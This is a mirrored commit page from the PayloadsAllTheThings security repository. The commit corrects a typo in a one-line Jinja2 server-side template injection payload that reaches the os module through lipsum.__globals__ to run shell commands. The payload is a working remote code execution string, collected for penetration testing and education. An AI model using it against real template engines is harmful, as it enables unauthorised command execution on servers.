Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-04 18:40:41 +00:00
Code Issues Projects Releases Packages Wiki Activity

SSTI / jinja2 : Removed dot in lipsum.__globals__.["os"]

Browse source
This commit is contained in:
Rémi GASCOU (Podalirius) 2023-05-09 20:15:02 +02:00 committed by GitHub
parent 8d2c30e969
commit b3f98adf0c
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
Server Side Template Injection/README.md
View file

@ -576,7 +576,7 @@ Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/
With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a path to the `os` module from `lipsum`. This is the shortest payload known to achieve RCE in a Jinja2 template:
```python
{{ lipsum.__globals__.["os"].popen('id').read() }}
{{ lipsum.__globals__["os"].popen('id').read() }}
```
Source: https://twitter.com/podalirius_/status/1655970628648697860